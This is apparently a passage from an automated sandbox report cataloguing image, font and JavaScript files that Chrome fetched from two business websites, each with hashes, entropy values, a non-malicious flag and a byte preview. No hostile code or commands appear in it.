                                              Preview:.PNG........IHDR..............S.R....gAMA......a.....sRGB........'PLTE...............)))>>>TTTmmm............1.w#.. .IDATx........$e..%`.2...h............l8..v../9.UE...Z.3..s8b......U.._.r........]....'|.t........=........2.u8.....^(.nw]6T.x.*#..:...vw...m.....'...g....f..U.`...N...fwM..S..L...8..4.h...nu..........A....~.~....P.t.oto.e^W..XNMr.Z3?..%...?.'.f..5....'..6.Dw.'O0....!.XN.1<.7..^........l......P.&...|a.~...H.2.........}... @(@..`..0..w..'|.?.!..x...}.....$.[x=5..[....f>.;...I.D.{.$......I........a..k.. .R...`...y..w8....+....=b......B.=....{.......=..N.`.o.....G.....&.......!...v.@._..%`../............).s.?.gI......\.... ...Z."..w..B.....G. ....0..TV.)<.....P.c..u.s..{V.............[..C2..A...6#....0-..(.r.....T$...).8"..... Sg.^............GZ.3..... @. ....r.`....m....._. ..^......c. .!......`.....M...lj.m...`.............k#.pE`.t." .@..P......W.. .Aj...@.}.(. .@..o..h...."..E.=.@...../.....X......@?.g.........8.h....(.`j.H.........]..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2336
                                              Entropy (8bit):7.883320764049964
                                              Encrypted:false
                                              SSDEEP:48:z3GJ7CEu+oX+FGfWxDCFEpl/BbfGMLEEhNs2fSk5Ov7iY7Nyxn/96:zK7CE8tWbpVFOKmkSM6b7G/96
                                              MD5:9C5378579D5567C82B8C747BD0C3DBBF
                                              SHA1:2E7A1B710D00DE191FE3DF75F3DF126EDA5C612F
                                              SHA-256:88E9C0D3DD54E1EC4AF789449AC85EFBC0B18469689B62D54BECDC64DBD47760
                                              SHA-512:FC88AA50A1419500E8178E1D26AF661DB36DB6418BFA3AC2579B4718862FC50A29C0357E61A0F098A79928970B6D27B490B818DED3F5F9EBAD7CC5FA8984D23F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/adobe.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...QPLTE........................................................}.......32.KI.......jd.&!?..C....IDATh.Z...0.$!..I .........uAqz\.[....U... .,.sk...Y.t.\...E.....nm........Ep. ..:.>.+..m..'....p.%.....e.W0]i]}l...e......"eV..M..g...(.W.WMi-...B.p.m.>*..S.....Ss..)c....^.n`t......60..K..R.ZJ..\.\,!....9.......%...ot{Z9o..C...$.....T.(....1./..`.z.su...Mk.|.;Ai...ST.. .@x.i...gu...A.....*....6.;.u&.g.c.Mn.{..2... Y.....y..}..c.d..J&.....Qt.q...E....dT..T..kJ.d........:d}WIw.......L......2....N...Oa...'.c.rA...f.._.C ...t.m....h..x....L.Dy].B_....C.....!....<.f.|zC%....C Y..r?.x..~./.KO.q............q(...w......J.e.).....JP..I)a..6../v@....W..b..D61....... .$....M.^k{...Aj...@Rv...Q..0A.I.D..[.<......!&..t...E{.E.;p%....J{6Ny I..$.F/..]...I.oA,"...w.H/..}.D...TS.@G?.D."zY..9..m.+..I.s>....>..k.G.45Iv......>..m9:.@....D......I.....).....E."..'..<PF..F.cR1.... ...{..0A.Q3.C<......3....Yt-..nG.M5k....J..X;.(.@.....I2..V
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2954
                                              Entropy (8bit):7.917427637196805
                                              Encrypted:false
                                              SSDEEP:48:8ZqF+DlS3keZt7x4xT84s7R8qgLDMeg7o7MjfJKuqoaquMajpvGIDUaqBm:Z+DpWxXSIej7MDX1IP9
                                              MD5:4287C826185C2869D46A4A67594A8DE5
                                              SHA1:E1F5CDEDDBF32D563346C94C763E9E98FFD04153
                                              SHA-256:BF93A11B4A927B2E6191E1E70E9BAB23F35665CF859E9BB37789CB8A98243BC1
                                              SHA-512:8718F00C4521AED747364CD5944DE0F01B57A7CB3CD7C36786BFE1118AFED665BA02F310990D0EB669951D4C840C788AA06997D5FFE4C896E062553F34432417
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/privacy.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...l....9......|....,.#.r.............w.H.[............0.`.h.S....B.w....O..........o.......=........'.....>............].O...=[.<....IDATh.....L..).....V.....q.f..r...w...zf.&.v...)J..$...N...6Pv8..`..~C.Q .V.u=...\5.1...@.(`...).!......!.s..~f?.r.$.`..[..3..*m-......p.)A...k.0..*.I.9].._r..#.8.n$.e8L.....D....@.O.........,.....HW..1.."... ..l...a...`.....Wq.ob.H.B.4rcF.f+...a.pFs..>..o.Q*..5O.....lV.5.5`. ..K_..(...]O'..".gO..H\..l........u.......;..C.7.5...h.MaY...4...G.A.J.%.arBt,..v+05r!..F...<.....s..|>..h!..A'.......a....#../..$..@i.h.. .d8.....l....i.F...G|...c ^.h...l...&.9....ox....,..%..!e........X....P8............6.7..O%|.>...H.........:X.....H.(..k.b]....3........m..~...>....~..N.,d...")...x.>..'....x.t..Q...T....B.a{4...r.z..$.O..|.'R.:....._.OX{>B&.LU.5.. .......8...T.3..6~..8...0.o.e.>..?B..b.x...%...P}.......:..8K....x`..i..n\.Z.@.?B.4..$.43..3.G.~'..Zu8...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7569
                                              Entropy (8bit):7.926954522048666
                                              Encrypted:false
                                              SSDEEP:192:EBm8ys8oUYcPhdg1Ko1J1BRbg8bfLO/F9:EBVydoVGwwShUyO3
                                              MD5:FBD583CE717AED4AB82F29A8F9F0ADAF
                                              SHA1:D6D65987A3A0B250B5F05C8AF6AD14301D69DB1E
                                              SHA-256:E0588ED878BC3EA6884CD9E8CD244A39638005D9CDEDA4E9CFF4B8AE63B4E864
                                              SHA-512:0D319FBD5946B1F30A0AC5E1B9A434592CCBDB718A38AC0140470F56BA031375A177BE5065827076822DAE28ED8F25E61F8379D99B1B0BCF9635D95D23D2D7AF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/woocommerce.png
                                              Preview:.PNG........IHDR...d...d.....p.T....tEXtSoftware.Adobe ImageReadyq.e<...AiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.0 (20230801.m.2265 3a00623) (Windows)" xmpMM:InstanceID="xmp.iid:ACF7431035E811EE9D71C58F3E9D5C90" xmpMM:DocumentID="xmp.did:ACF7431135E811EE9D71C58F3E9D5C90"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ACF7430E35E811EE9D71C58F3E9D5C90" stRef:documentID="xmp.did:ACF7430F35E811EE9D71C58F3E9D5C90"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>\J.U....IDATx..]..T.>wyU.]U.t7.4...#.kPA....8J".1.o&.3...}..bt.d.IF./..$&....%FbD.D.%.o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):21564
                                              Entropy (8bit):7.817166207653922
                                              Encrypted:false
                                              SSDEEP:384:4YNg7IdbtbSzoHEMEcNZ3ums7jnELCfOAHMifC1Cteq:4YyMddSMHNEW0AQHMif1eq
                                              MD5:A8E43BD8CDA343E9F40C400E5CE30BB6
                                              SHA1:E5CF1AE10723D911AFF24DC877BBCE66BFAB3B72
                                              SHA-256:F8C1CD123D33E35C755438C21A0586ACFC089C1416AF857EF3BDA7B0AAE60449
                                              SHA-512:B2DDBCDE1243C9951DF83ED337873B1ECFB9ABEF41B33D92256BACCA39CD19F1DE941982DA28D2C82A21F03DA1D838915E7C160A4CC3DD444332E2485F26440A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/23/435a46083d643311d9972ded5ec0d887.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:downloaded
                                              Size (bytes):43652
                                              Entropy (8bit):7.934115018615934
                                              Encrypted:false
                                              SSDEEP:768:0oCEJV0DogAnV+lAGNii8/V9DJ/tSzubGP1w8znWNvEOOWlBg0BvhxbvFZ/978Ki:bhqot4lzNii8/p/tAmGPmKOEYd/xjFX6
                                              MD5:88A2EF43D9586C9567E69EC218E986FB
                                              SHA1:C056878036B8F0A0F79324331F20AFF12895E5E3
                                              SHA-256:97D38C2247CAFBDAC6AAF0515A2B242418B4ED851214BC90C8474E9B75D549B9
                                              SHA-512:94014713672634D26895B0C68B42AAD68EDC1C7230918BAFB422051512CBCA5132695F0FD75FA4D310B705C8D9799ED64C69B5C2D740E6AF3EAA15C31A8A16AD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi/hOPpxvP2E28/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgWyhIMA8=&rs=AOn4CLB1pwsAn0qkJuzQscocunfjgcf4QA
                                              Preview:......JFIF................................................. $.' ",#..(7),01444.'9=8)<.3+)...........&...&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&..........."........................................Y.........................."2..!#1BRAQabqr.3C......Scd......$s.....%4De..Tt......EUf.................................$.....................!1..AQ..aq".2............?....B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..Z.....d.d..6..G.'.,..k .........b.d..=..%........cP...}.......C..3......=..5Xt-...O.-o....e...F....G..#....V..v?.._.......2t?..n5o....t........[...........=.ib.R.uq.F..e......`.C....S.R...WE...|.S.......g...;....?..3l...._..y...W8/ h.F^Qs..9p..?c.<oUr
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):40342
                                              Entropy (8bit):7.993864125148155
                                              Encrypted:true
                                              SSDEEP:768:hHsb1iFc4JZwXmJlSgZibMwmn8ZyrULBBwU7pIszHa2llz:BsZOJfgm6a8lm8ZyrCBwUzz6+
                                              MD5:6A7F72562B94426A072F5D17FD0D71D5
                                              SHA1:FF574697687D7FADABE9924038F22C47A482C4B1
                                              SHA-256:B6A40F822BF258767EF643704621BBEAE96043D2169065863A4BC21C65AC06D9
                                              SHA-512:C02996F982C7ACDF268BBDC3FF603D853EE3800CFFA46F7C4BC236AD2C148B9A3209EC01D570021BC73D31DC4C7535530B99E00A4F3F9A8CD043A9C616720B7F
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 .........*....>.t.S)&.0#.y....im..]....@...._.....[.W.|{9.....;...@..j......'._......s...7.v.p.:.8.#{.)O.....Q........i...W......+._.......<.....O....g.O..K...._.)..;..._......Q.....N........................................../..L...l{T*W...c.......<.........7..bxu/uUe.._...k- ...W.DKYi.W....M6....j........:.|.J .(i.-^..h7:.Q....^..==.I....=..*KJ.....:.h..e..N"30.0.....i.M..uq..e}s.d.........;..)m...1A.<..(o.(9..yoSAkV_....Q........_,N.........@..0.S.....M...LZi....t.T'......3H.5}...,..i;..fN1...]...[T..b.:..hr/...S.*J._6;\*...~..V^.)B..|...>...U`t.....0....'...z.%TB.G.....|..>(........%=9Gv...W...9X...%L..Q.(:..o.T......?.....g...e$O.D.,RsW..`U....-.k.$.\2p.T..K.........@]. S&T3.L..|D....5..q)v...J.@....."+..?....Nr....'..}....m.....8..(.Y.}Z...Q{.lx....q.t.<7'04T.Bx...h.3.....q.J.W{.....-@..F...........A{.+..A..../;.".k...7M.F.:..D.x...b..s......[/..h....x....^..L.@..7/.Z.... i..p8..<K.zb..."y.......A.i..+2.>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):147556
                                              Entropy (8bit):7.998582910036463
                                              Encrypted:true
                                              SSDEEP:3072:XEV+SqxgawOmrInZPfyaZw8nNYT3mVMPD9GWbcgcqPjM2s2V4R2SO:XE9q2Hr6Pa+wyYLnD9GWbretR2x
                                              MD5:98566593DB770FD8CD8DF201541E7418
                                              SHA1:4D459B0D275C797D961ECE0A2A35ED1939516C7E
                                              SHA-256:2C68614A49CEED6A3A206E29D35640701DDA655F749A9B056A5B29AE47216E41
                                              SHA-512:A3ADAFAFB7ED5DA02BF72448F899853464F09F1DDCD3F17393A173A8666269D268E7D96AD700EA6896E095F089CA13C17C136D4C1509F37990CF1FEDDE48F590
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/32/a5af5c8ac06932758cc7ca886fdabf1b.webp
                                              Preview:RIFF\@..WEBPVP8X..............VP8 .?.......*....>.d.N.%........M.[..xh..f..h.....?y.]...{.....-.U..nQ\}...z[.y..0.....=..v.h|l...>o....?.........3................>.~...^.^...%}.?..b.....O.K...?{..........b~.....C....?...../.O..X.O...#..t...s.G.ob.e.......w.?e.|............i.O..........c.g.{...o.?...|......q.'..............VrK.....E...T.....6.;.C..|t.....D.v..i...,.g..zj...e..Jd,.9.j..............F(.y.....p.w|.........n.".s.5.Z......os..xc..z^........3.....W...{O"..q..0p.@.\Mu.<.y._M.K.+\F.o......O....c.....,...../@...x....... M.>..{.c..)..o.h.\..{.T...A5.c.j.....m.........Ob..j....Y......q.I...?.4?Zk...\nE...0.=sn7....o...Q..>1..~...X..'.D......i..t.y........^#.Mq14d.F....|..&...BD...7U+............(:.O.lIc.+j..._.@i.DWl.X.....V.a........b#.....K...(L..\ ..I,&...0..v._a.*S.^..x.....;..6`...&.[4mu...u..r....3d...>....[..D~..$..H.....U..;.b..H?..KZ.O..Q[..2........$.`.H)...a..-A&.K....^..........s.......2..#....$.n...j......O..XI...^T.O..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):45146
                                              Entropy (8bit):7.995401942782514
                                              Encrypted:true
                                              SSDEEP:768:eO0ApJdOEitXJNHLR1vuJ2TVKY9wfu3DxbZPouF0OPe566P16H58pEu+WG5in:eO5zoXPHd1Gi9rTx1/F9RH5s3zG5G
                                              MD5:53CE7BE7619CB90A93A5CF16495D1A8E
                                              SHA1:9430BE01AF9A718C0DE318765309707218E95026
                                              SHA-256:D6F15D1C083F51B2DB1BD31F290748E4DF7A2F91720ABB9E0FD2454C2DDBB56C
                                              SHA-512:EAB99DCE3C06478AB3D14DC2A347BF6AA1455196AC25A45C185087063C9F973F1B084518E28C782223CCB835A7F86FF4F7E736B6FA7AB6E553D99B8CF026DA1D
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFR...WEBPVP8 F....R...*....>m2.G$".%(.:P...InNb}...,s..l6.+..h...;......}....f.......?4...G....fz......Z.....O.......~...~......[....|_............W....\...F...........g.......s........j....;}.5...................*..._._t...S.?._.?.x.../.....R.y......k|:.....?.{.{m.....}.......................~.|..D.!.............0...w.o..!......./................K......n.....*uj.b.w.];z...0.D..$H."D.....W.$....f....Y...w`.....d....]...&d:.....eZ....3.3...(.f."..@.Y...9.....A..BDzi.2.x*/@..%..:'mH......BP...uU....5.5.^O.zbzs..fe............(.g.~.Yi./.q..?.g.{.(..,.<].U...yC..}.!m..6...`_..f.n...-..B.u.!.H....lx.nT..N..h.A.*.$..:......h.y.,b...#...u"..]........"y...<2]..h...wQ6....Im.4?.g..s..Tw......mJ.......".n ........xA!..~I...@uX.i.D.M^...........M.]`ZzQ.`..;..).A...B.*.....E.4.Y....dn..T...../..fU[;...mD...X...[..`.~....c....~..4Y....^.r...{..$....\...!....%.Nuz.x!..........CO.......YU9...R.>..a..d.....d.-....NE.5?j...b....i.%V?c.i.ZFW....^p$}M<.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3479
                                              Entropy (8bit):7.929772532023311
                                              Encrypted:false
                                              SSDEEP:96:oVrfRRPR+jQipCcAt4GIcMiEdB8a5JRHr:0bP53HMiPKJlr
                                              MD5:22B1B9A352C7EFF84D6FEB1A494DE899
                                              SHA1:EFD314530E3FEAB9D40D40B04DAC3DDBDD64422B
                                              SHA-256:C5F70EC03438DAED411CDF99C6CE8293F7B6DB8E2E453A293F7BDADC16598B1A
                                              SHA-512:9DE3135AE6426C94AC007CCB8619EDE380B86E962DBDB4676C78CA3DE8DE60ED45EA1FAAFE8375EDAE4CD982C0C8A9DDC986EF66FAF6B0D9FE5DEB8ACEF50727
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...,PLTE.c#.........F;L......................a ....^!.....".w....TXk....]$....b..f.......e)....l.I?Q.................. ..........c..........l.@6H.^).d-....b....\`s...........$..&......MK\....g..[...../.`$........6/?.h4._....z................n...vy...}..9.o..........yJ.......o.L....@..^..B.qN.di....&IDATh..k[.\..A.........2.S.#(y.<e..k......^..if........u].....{..&..E./......|[....q..N...w .F..<..p.'5..1d....&....L..(..>............}.J........J...N.j.Nl.p......k .(<Qi.T...R..I."!r...p...."7&.@(......a ..".[.xx..Pk#q...{.~....._.U......r.B.;.a..p..~Ep....v.g..{..~:.z<....M!....eL..6C.x.&f..O..p.....A(>l..k.M.....T3....Vw...p..p.....1.....g..I...E....."..\.}%....).}.(....(~3..SM.,FC$v.... .b.[..<.<.q.f..j........A<..P..(.so.P..v%..]TzH.{A...xt..R..N...H.E.c..N..H.K...WrUrX...Y..dH......... .A..!..j....<;..r....Cw..h&C.3.J.Ul.r.H(.<..*..y.6.."i.~A]E......../h*1...9*..|.Q...WC-...w.o n.....rVJ.~........M..X...\\\..[@....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65293)
                                              Category:downloaded
                                              Size (bytes):79742
                                              Entropy (8bit):5.18245217940784
                                              Encrypted:false
                                              SSDEEP:1536:2JC+tkTbR2t4i+AitLJLr2gykHgWskGvD/mZLwoZ0ea1sJBTR:suBQkGjmZLwoZ0eisV
                                              MD5:6DAE88ABA81E468737C510CC2E4EC1DD
                                              SHA1:6B4B985A90ABD7AB1C2E35FF3B874D07CF8410EE
                                              SHA-256:2515E37EEE31F5EF3D659B21DCC84DC6EA732B06872DA51078B5B526DE34C0C1
                                              SHA-512:9DDAEB47DE0F5B7724680BEF5AB033462E495A317BD7F3F0ED3952A3A8EE74034E1429B3D1DFB4604FAA2066A64514A75734AF2321ACE014EDC85326DCC4FF72
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/bootstrap.bundle.min.js
                                              Preview:/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                              Category:downloaded
                                              Size (bytes):18536
                                              Entropy (8bit):7.986571198050597
                                              Encrypted:false
                                              SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                              MD5:8EFF0B8045FD1959E117F85654AE7770
                                              SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                              SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                              SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                              Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4880
                                              Entropy (8bit):7.937068265130278
                                              Encrypted:false
                                              SSDEEP:96:q5biEAUT6XtohNEoHdq2lmDjgmVcNbE03BFeqXv3Sl+:q5bdcdsNEoHdq6mDsIchZ3WC3Sl+
                                              MD5:581448FD68DF3124D4B888B42ED46404
                                              SHA1:16AE28E566CEF7184B3608ED90C7E4A78A48F0DB
                                              SHA-256:A36D526E51EF75AAC8982AFEE30417CA0C3E9E2C8D021F85F1DF7989936ED554
                                              SHA-512:A95B90EBFA2DB9B72B519E1C4551646C785B8DB9EC2897E3CD007A50CE83FC4E81984241A5990063E0A67FC7F9026110C8A7461878D098930F9C07B27A07C46A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........h.................n.................................................l...........X.............................../.......................d...q..n.......6.al...................,...........^.p............T..... .........?......|..................w>..O.#pio.....E.aG....-g]dS.......-Q.*.BQ........;......d.....kF.#.....t..y.a..ZC....}..n...}p}.....i.........m`..W.wgzeXs..g..#ylf....U....jrX.)D........Tb..l[R[.$...l....!..ra.8.....A.V.......m............t.NI..XO.1......n.J......|.b.=...s..y.....J.t...q`O.xN..-xi...Z............'...E{.9....U..Z.....v.\..=..{...Q.....R..Y.......[.<......M...LIDATh...k.....1.4.3..8&....5....:...Q..U....!..4.4.%.)......5.$.-.B^.@^5l...o....t.3j.......:...y.9..12.......:..+.4]..je+n#I....Uv."d8NX.D.......F.....ZG...N .@.4A2d...%.@B....p"M.w.@3B. .v.H...+<..|.P8>).Vu..".wIR'....l.p.......z.ru7..&m..3.......|...,'4...@t.c......,..,.A,.;..4M....0...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):20031
                                              Entropy (8bit):4.657102504631418
                                              Encrypted:false
                                              SSDEEP:192:B5dArwvrUVzBSZyWyJ8UGicwtOTRqiS+SjUG3DcYthhmyMKHKQOOH4sykZN5IPeO:BuwuSZyWyJ8pcT3QuhvOOYsykqM0
                                              MD5:61524E1041A48EBFF8546E69B75648A3
                                              SHA1:33CCC4A5B42CEBB1267E4053228ABAA6A88F851C
                                              SHA-256:AE09E9BBB87B3DB844DA931CFAC1D2FB8B079E4950E953E674716127647564DA
                                              SHA-512:C80C96A4289E18E013D79B13CE107097DE1C5453C465702B1A3BE54BEC4DCC2C128F4106EEFFCFC941A12879BFD6E5405C33EB34BB103DAB4A0136A10717DFAA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/js/scripts.js
                                              Preview:....document.addEventListener('click',function(e){.. // Hamburger menu.. if(e.target.classList.contains('hamburger-toggle')){.. e.target.children[0].classList.toggle('active');.. }.. })..........// all ------------------..function initBalkon() {.....// loader ------------------.. $(".loader").fadeOut(500, function() {.. $("#main").animate({.. opacity: "1".. }, 500);.. });...// Background image ------------------.. var a = $(".bg");.. a.each(function(a) {.. if ($(this).attr("data-bg")) $(this).css("background-image", "url(" + $(this).data("bg") + ")");.. });.. .// css ------------------.. function d() {.. // $(".alt").each(function() {.. // $(this).css({.. // "margin-top": -$(this).height() / 2 + "px".. // });.. // });.. var a = $(".social-wrap li"), b = a.length, c = $(".social-wrap ul").width();.. a.css({.. width: c / b - .5.. });.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):152926
                                              Entropy (8bit):7.9986612053401736
                                              Encrypted:true
                                              SSDEEP:3072:rZub6k1HwGMzvPRYOTdZ7G8w62F7xYxeKsUXAIOe:lub6k1QrvPRtTf7PwlYxrs4A3e
                                              MD5:E64A27CC3C13AB0C4D859CE4DED3E1FE
                                              SHA1:373F1726DE311CE9F60557897934453D086CB72E
                                              SHA-256:D05CFC1E3FCA2CC3602830EFBE6FD8AC13895DB8E6523909AF36765A338AC39D
                                              SHA-512:91A99F3DC8C9F7D0BBA7DB9810C0A814DEFED44A548E0B9F8EAE7BA5C5B752B3A78EA5801782D933D2886E5CE84645FC8AB30E7AE91FE82BB351F411EB7D86B5
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFVU..WEBPVP8 JU...l...*....>Q(.F#..&!.....in...w..+.&....s.2....[.....n....$`..>j...%.7......S.k.7..............Ns...>m}k......W...y......^.?R...M.....#.w.G.o..S.4.D...{...k_.=..w}.5R~................h.../.....>~..._....W............./.?....O.......{..C.....o....-....................................?..c}..T.....W...<h.G.....+..._....7~.?..........?....s...C.....O............\.5....*'&.)6...J...'........\..kJE..i.+.....\p...'.t`nF...W.O....SXp....7.5...Ma.<\J.....de!$.S.<.B.....X.c..[.|....73Ll.f.T...M...] .l#]..|..B........UX.S.....J. .._F..yZ....C.*.._z....v+......n.....Vz.I.}..q.&..O[.J~.....#$...C.-]...u.W......$.%.,....ps.....v{.........8._.......A...h|.t..6.......x5..%9........e.^....c...Y....5......SXp....7.5...M`..&..5.N.Gr..V#.08o.k.........2....N.....V...F..bj.[V..n...B..?....l.7.5.7.y4....7.5...Ma..S....iC6{.......Q..'........;].....Q..b8.*d...<Ret).,...&......a....u..x.l...#B.8E.$.#.V......G.Q..../%...4.......0.},...\...Er.@.:W..].W*.&s.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text
                                              Category:downloaded
                                              Size (bytes):19844
                                              Entropy (8bit):5.052971847366901
                                              Encrypted:false
